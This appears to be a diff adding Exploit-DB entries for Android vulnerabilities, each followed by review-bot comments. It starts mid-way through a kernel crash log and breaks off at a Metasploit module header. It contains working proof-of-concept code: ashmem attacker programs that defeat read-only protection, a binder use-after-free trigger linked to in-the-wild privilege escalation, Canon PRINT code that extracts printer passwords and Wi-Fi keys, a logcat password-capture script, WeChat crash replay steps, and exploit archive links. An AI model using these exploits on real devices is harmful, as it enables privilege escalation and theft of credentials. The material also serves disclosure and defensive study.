<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401)
<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC
==================================
The KASAN report points to instruction 267c in the following assembly:
==================================
0000000000002630 <set_page_dirty>:
{
2630: a9bd7bfd stp x29, x30, [sp, #-48]!
2634: 910003fd mov x29, sp
2638: a90153f3 stp x19, x20, [sp, #16]
263c: f90013f5 str x21, [sp, #32]
2640: aa0003f3 mov x19, x0
struct address_space *mapping = page_mapping(page);
2644: 94000000 bl 0 <page_mapping>
2648: aa0003f4 mov x20, x0
264c: d5384115 mrs x21, sp_el0
if (current->jh_task_flags && mapping)
2650: 9128a2a0 add x0, x21, #0xa28
2654: 94000000 bl 0 <__asan_load4>
2658: b94a2aa0 ldr w0, [x21, #2600]
265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>
2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>
msleep(500);
2664: 52803e80 mov w0, #0x1f4 // #500
2668: 94000000 bl 0 <msleep>
266c: 14000002 b 2674 <set_page_dirty+0x44>
if (likely(mapping)) {
2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>
int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
2674: 9101a280 add x0, x20, #0x68
2678: 94000000 bl 0 <__asan_load8>
267c: f9403694 ldr x20, [x20, #104]
2680: 91006280 add x0, x20, #0x18
2684: 94000000 bl 0 <__asan_load8>
2688: f9400e94 ldr x20, [x20, #24]
268c: aa1303e0 mov x0, x19
2690: 94000000 bl 0 <__asan_load8>
2694: f9400260 ldr x0, [x19]
==================================
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip
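Review bot: the pasted kernel log contains binary garbage in several lines (the `el0_svc_naked` frame in the "Allocated by task 2684" trace is split across two lines with non-printable bytes, the same corruption appears in the LR dump and in the `x3` register line of the second oops, and the log ends mid-line at "---[ end trace 8d4DBGC"); the log should be re-pasted from a clean capture so the addresses and the end-of-trace marker are intact. The file also lacks the "# Exploit Title / # Date / # Exploit Author / # CVE" header block that the other new exploit files in this commit carry, which makes it hard to find the tracking ID and fix. Since the report already points at the safe API, it would help readers to state the remedy explicitly: `kgsl_mem_entry_destroy()` should mark KGSL_MEM_ENTRY_USER pages dirty with `set_page_dirty_lock()` (or otherwise hold the page lock or a mapping reference) instead of calling `set_page_dirty()` on an unlocked page.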

View file

@ -0,0 +1,79 @@
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
More infos
LineageOS (Android):
02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5.
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
mplayer (laptop)
id: 0
[hevc @ 0x7f0bf58a7560]Decoding VPS
[hevc @ 0x7f0bf58a7560]Main profile bitstream
[hevc @ 0x7f0bf58a7560]Decoding SPS
[hevc @ 0x7f0bf58a7560]Main profile bitstream
[hevc @ 0x7f0bf58a7560]Decoding VUI
[hevc @ 0x7f0bf58a7560]Decoding PPS
[hevc @ 0x7f0bf58a7560]Invalid tile widths.
[hevc @ 0x7f0bf58a7560]Decoding SEI
[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
Error while decoding frame!
This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
So the check are there.
On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
I have the google codec:
OMX.google.hevc.decoder
I am wondering however why it does not crash ....
Attaching the video (videopoc.mp4) that should trigger this condition:
if (value >= ps_sps->i2_pic_wd_in_ctb - start)
+ {
+ return IHEVCD_INVALID_HEADER;
+ }
Maybe somebody have more luck.
More infos 2
Whoooo hooo .... made it :)
Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089
07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9'
07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64'
07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<<
07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001
07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04
07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0
07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001
07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020
07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006
07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001
07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438
07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000
07-13 21:50:59.013 24089 24089 F DEBUG :
--
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip
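Review bot: the claim "You can own the mobile by viewing a video with payload" is not supported by the evidence in this file: the attached tombstone shows `signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050` in `media.extractor`, which demonstrates a crash of the extractor process on an unmapped address, not control of execution, and the author states "I didn't include real payload". The write-up should describe the attached PoC as a crash/DoS reproducer for CVE-2019-2107 and point to the Android security bulletin for the fix rather than asserting RCE. The libhevc snippet `if (value >= ps_sps->i2_pic_wd_in_ctb - start)` followed by three `+`-prefixed lines is a fragment of a fix diff with its context stripped; give the AOSP commit it was taken from. Spelling: "HVEC" should be "HEVC" and "Andoird" should be "Android" (twice).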

View file

@ -0,0 +1,24 @@
There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy.
To reproduce the bug:
1) install and run frida on the caller Android device and a desktop host (https://www.frida.re)
2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists
3) run "setenforce 0" on the caller device
4) extract replay.py and replay.js into the same directory on a desktop host and run:
python3 replay.py DEVICENAME
Wait for the word "READY" to display.
If you don't know your device name, you can list device names by running:
python3 replay.py
5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds.
A crash log is attached.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip
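Review bot: step 2 reads "copy the filed in the attached directory"; it should say "files", and the hunk never states which WeChat version or which caller/target devices were used, which a reader needs to judge whether the crash log applies to their build. The description also implies the fix direction without stating it: UnpacketRTP must reject any packet shorter than the 12-byte RTP header before subtracting 12, and the (n < 300) bound in CAudioJBM::InputAudioFrameToJBM should be evaluated on an unsigned length (or paired with n >= 0) so that a negative length can never satisfy it; spelling that out helps whoever triages the attached log.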


@ -0,0 +1,250 @@
This bug report describes two ways in which an attacker can modify the contents
of a read-only ashmem fd. I'm not sure at this point what the most interesting
user of ashmem is in the current Android release, but there are various users,
including Chrome and a bunch of utility classes.
In AOSP master, there is even code in
<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>
that uses ashmem for some JIT zygote mapping, which sounds extremely
interesting.
Android's ashmem kernel driver has an ->mmap() handler that attempts to lock
down created VMAs based on a configured protection mask such that in particular
write access to the underlying shmem file can never be gained. It tries to do
this as follows (code taken from upstream Linux
drivers/staging/android/ashmem.c):
static inline vm_flags_t calc_vm_may_flags(unsigned long prot)
{
return _calc_vm_trans(prot, PROT_READ, VM_MAYREAD) |
_calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |
_calc_vm_trans(prot, PROT_EXEC, VM_MAYEXEC);
}
[...]
static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)
{
struct ashmem_area *asma = file->private_data;
[...]
/* requested protection bits must match our allowed protection mask */
if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &
calc_vm_prot_bits(PROT_MASK, 0)) {
ret = -EPERM;
goto out;
}
vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);
[...]
if (vma->vm_file)
fput(vma->vm_file);
vma->vm_file = asma->file;
[...]
return ret;
}
This ensures that the protection flags specified by the caller don't conflict
with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent
the user from afterwards adding new protection flags via mprotect().
However, it improperly stores the backing shmem file, whose ->mmap() handler
does not enforce the same restrictions, in ->vm_file. An attacker can abuse this
through the remap_file_pages() syscall, which grabs the file pointer of an
existing VMA and calls its ->mmap() handler to create a new VMA. In effect,
calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an
attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write
access to the ashmem allocation's backing file via mprotect().
Reproducer (works both on Linux from upstream master in an X86 VM and on a
Pixel 2 at security patch level 2019-09-05 via adb):
====================================================================
user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
int main(void) {
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
err(1, "ASHMEM_SET_SIZE");
mapping[0] = 'A';
printf("mapping[0] = '%c'\n", mapping[0]);
if (dup2(ashmem_fd, 42) != 42)
err(1, "dup2");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL);
err(1, "execl");
}
int status;
if (wait(&status) != child) err(1, "wait");
printf("mapping[0] = '%c'\n", mapping[0]);
}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
int main(void) {
int ashmem_fd = 42;
/* sanity check */
char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (write_mapping == MAP_FAILED) {
perror("mmap ashmem writable failed as expected");
} else {
errx(1, "trivial mmap ashmem writable worked???");
}
char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem readonly failed");
if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)
errx(1, "mprotect ashmem writable worked???");
if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))
err(1, "remap_file_pages");
if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
err(1, "mprotect ashmem writable failed, attack didn't work");
mapping[0] = 'X';
puts("attacker exiting");
}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c
user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c
user@vm:~/ashmem_remap$ ./ashmem_remap_victim
mapping[0] = 'A'
mmap ashmem writable failed as expected: Operation not permitted
attacker exiting
mapping[0] = 'X'
user@vm:~/ashmem_remap$
====================================================================
Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even
listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by
Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits
it for 32-bit ARM applications:
# b/36435222
int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags) arm,x86,mips
ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,
there is no access control for these - even if you only have read-only access to
an ashmem file, you can still mark pages in it as purgable, causing them to
effectively be zeroed out when the system is under memory pressure. Here's a
simple test for that (to be run in an X86 Linux VM):
====================================================================
user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
int main(void) {
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
err(1, "ASHMEM_SET_SIZE");
mapping[0] = 'A';
printf("mapping[0] = '%c'\n", mapping[0]);
if (dup2(ashmem_fd, 42) != 42)
err(1, "dup2");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL);
err(1, "execl");
}
int status;
if (wait(&status) != child) err(1, "wait");
printf("mapping[0] = '%c'\n", mapping[0]);
}
user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
struct ashmem_pin {
unsigned int offset, len;
};
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
int main(void) {
struct ashmem_pin pin = { 0, 0 };
if (ioctl(42, ASHMEM_UNPIN, &pin))
err(1, "unpin 42");
/* ensure that shrinker doesn't get skipped */
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))
err(1, "unpin 42");
/* simulate OOM */
system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'");
puts("attacker exiting");
}
user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c
user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c
user@vm:~/ashmem_purging$ ./ashmem_purge_victim
mapping[0] = 'A'
attacker exiting
mapping[0] = ''
user@vm:~/ashmem_purging$
====================================================================
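Review bot: the err() label on the ASHMEM_SET_PROT_MASK ioctl in both victim programs reads "ASHMEM_SET_SIZE" (copy-paste from the line above), and the second unpin in ashmem_purge_attacker.c reports "unpin 42" although it acts on the freshly opened ashmem_fd; mislabelled error strings make a failed reproduction hard to diagnose, so change them to `err(1, "ASHMEM_SET_PROT_MASK");` and `err(1, "unpin new fd");`. In the purge test the final line `mapping[0] = ''` is a NUL byte printed through %c, which is invisible in a terminal; printing the value with %d (or %02x) would make the zeroing unambiguous in the transcript.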


@ -0,0 +1,48 @@
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:
- Sometimes developers keeps sensitive data logged into the developer
console. Thus, attacker easy to capture sensitive information like password.
- In this application, with adb, attacker can capture password of any
users via forgot password function.
#Requirement:
- Santoku virtual machine
- Android virtual machine (installed "EquityPandit" apk file)
- Victim user/password: victim@abc.com/123456
- Exploit code named capture.py in Santoku vm as below:
import subprocess
import re
process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
print '\t#%i: %s' %(int(index)+1, item)
#Reproduce:
- Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
adb connect x.x.x.x
- Step 2: From Android machine, open EquityPandit, click forgot password
function for acccount "victim@abc.com" and then click submit
- Step 3: From Santoku, execute capture.py
- Actual: Password of "victim@abc.com" will be show in terminal as
"123456"
#Demo:
https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
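Review bot: capture.py is Python 2 only (print statements, a str pattern applied to the bytes that `process_handler.stdout.read()` returns) but the header does not say so; under Python 3 the `re.findall(r'password\s(.*)', dumps)` call raises TypeError. Because `adb logcat -d` dumps the whole buffer, that pattern also matches any unrelated line containing "password ", so the report should name the log tag the app writes, or anchor the expression on it. The remediation is also absent: the defect is the app logging the credential, and the fix on the app side is to remove the Log call (or strip Log calls from release builds) rather than anything on the device.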


@ -0,0 +1,129 @@
# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5
(CVE-2019-14339)
# Date: 24th July, 2019
# Exploit Author: 0x48piraj
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app
# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint
<https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint&hl=en_IN>#
Exploit : https://github.com/0x48piraj/CVE-2019-14339
# Version: Canon PRINT 2.5.5
# Tested on: Android 8.0.0
# CVE : CVE-2019-14339
The ContentProvider in the Canon PRINT 2.5.5 application for Android
does not properly restrict data access. This allows an attacker's
malicious application to obtain sensitive information including
factory passwords for administrator web-interface and WPA2-PSK key.
The mobile application contains unprotected exported content providers
('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that
discloses sensitive applications data under certain conditions. To
securely export the content provider, one should restrict access to it
by setting up android:protectionLevel or android:grantUriPermissions
attributes in Android Manifest file.
-- Proof-of-concept code (Java)
--
package cannon.print.pwn;
import android.database.Cursor;
import android.net.Uri;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.apache.commons.lang3.StringUtils; //
https://stackoverflow.com/a/50198499
public class MainActivity extends AppCompatActivity {
Button PwnBtn;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
PwnBtn = (Button) findViewById(R.id.button);
PwnBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Toast.makeText(getApplicationContext(), "Payload
triggered ...", Toast.LENGTH_SHORT).show();
Uri cannonURI =
Uri.parse("content://canon.ij.printer.capability.data/");
Cursor cursor = getContentResolver().query(cannonURI,
null, null, null, null);
int count = cursor.getCount();
TextView data=(TextView)findViewById(R.id.data);
data.setText(String.valueOf(count));
cursor.moveToFirst();
String tempstr = " ";
tempstr =" "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t"
+ cursor.getString(1) + "\t\t\t" + cursor.getString(2);
String dpw = StringUtils.substringBetween(tempstr,
"<ivec:product_serialnumber>", "</ivec:product_serialnumber>");
String dmac = cursor.getString(4);
String mdeviceid = cursor.getString(13); // raw
String dtype = StringUtils.substringBetween(mdeviceid,
";CLS:", ";DES");
String timestamp = cursor.getString(15); // ticks,
device last used
String dclass = StringUtils.substringBetween(tempstr,
"<ivec:manufacturer>", "</ivec:manufacturer>");
String dmodel = StringUtils.substringBetween(tempstr,
"<ivec:model>", "</ivec:model>");
String dserial = StringUtils.substringBetween(tempstr,
"<ivec:serialnumber>", "</ivec:serialnumber>");
String dfmver = StringUtils.substringBetween(tempstr,
"<ivec:firmver>", "</ivec:firmver>");
String dservice =
StringUtils.substringBetween(tempstr, "<ivec:service>",
"</ivec:service>");
/* More juicy data
String denv = StringUtils.substringBetween(tempstr,
"<vcn:host_environment>", "</vcn:host_environment>");
String dpapertype =
StringUtils.substringBetween(tempstr, "<ivec:papertype>",
"</ivec:papertype>");
String dformats =
StringUtils.substringBetween(tempstr, "<ivec:support_data_format>",
"</ivec:support_data_format>");
*/
String fout = String.format("Device Type : %s\nDevice
Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address
: %s\nDevice Factory Password : %s\nDevice Firmware Version :
%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass,
dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp);
data.setText(fout);
}
});
}
}
-- Proof-of-concept python script over ADB --
import subprocess, datetime, sys
def ext(out, var, rw=';'):
return out.split(var)[1].split(rw)[0]
print("[#] Make sure you've connected the target device w/ adb ...")
print("[*] Running the exploit using adb ...\n\n")
out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/")
if "<ivec:contents>" not in out:
print("[!] Error: Couldn't fetch data from adb ...")
sys.exit(1)
varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] #
factory_pw_check =
out.split("<ivec:product_serialnumber>")[1].split('</ivec:product_serialnumber>')[0]
prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"]
for prm, var in zip(prmz, varz):
print(" -- Device %s : %s" % (prm, ext(out, var)))
print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ',')))
print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds =
int(ext(out,', timestamp=', ', '))/10)))
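Review bot: the remediation sentence recommends android:protectionLevel or android:grantUriPermissions for IJPrinterCapabilityProvider, but android:protectionLevel is an attribute of a <permission> declaration, not of <provider>, and android:grantUriPermissions widens access (it enables temporary URI grants) rather than restricting it; to close the issue the <provider> element should carry android:exported="false", or android:permission / android:readPermission naming a signature-level permission. In the Java PoC the Cursor is never closed and the result of cursor.moveToFirst() is not checked, so an empty result set throws instead of reporting "no data"; in the Python script `factory_pw_check` is computed but never used while the password is printed via the ";PSE:" marker, so one of the two should go.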


@ -0,0 +1,80 @@
The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):
There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.
As described in the upstream commit:
“binder_poll() passes the thread->wait waitqueue that
can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT,
the waitqueue is freed, but it is never removed
from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup
code tries to access the waitlist, which results in
a use-after-free.”
The following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/20171213000517.GB62138@gmail.com/):
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>
#define BINDER_THREAD_EXIT 0x40046208ul
int main()
{
int fd, epfd;
struct epoll_event event = { .events = EPOLLIN };
fd = open("/dev/binder0", O_RDONLY);
epfd = epoll_create(1000);
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
This issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review.
Other devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):
1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) Oppo A3
7) Moto Z3
8) Oreo LG phones (run same kernel according to website)
9) Samsung S7, S8, S9
*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*
Confirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.
I received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:
* It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.
* The bug was allegedly being used or sold by the NSO Group.
* It works on Pixel 1 and 2, but not Pixel 3 and 3a.
* It was patched in the Linux kernel >= 4.14 without a CVE.
* CONFIG_DEBUG_LIST breaks the primitive.
* CONFIG_ARM64_UAO hinders exploitation.
* The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.
* The exploit requires little or no per-device customization.
* A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.
Using these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time.
We do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.
The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.
Ive attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. Ive also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 (google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).
Vendor statement from Android:
"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update."
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip
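Review bot: references [1] through [4] for the December 2017 fixes in 4.14 LTS and the AOSP 3.18/4.4/4.9 kernels are cited in the text but the reference list is not in the hunk; please add it, since those commits are what a vendor needs to backport. The KASAN PoC checks none of its return values: if `fd = open("/dev/binder0", O_RDONLY);` fails (the node name is not the same on every build) the program exits silently and a negative result is indistinguishable from a fixed kernel, so add checks and a comment that the use-after-free is reached only during process exit, when the epoll cleanup walks the freed wait queue. Minor: "Ive" should be "I've".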

exploits/android/local/47601.rb Executable file

@ -0,0 +1,162 @@
##
# This module requires Metasploit: https://metasploit.com/download
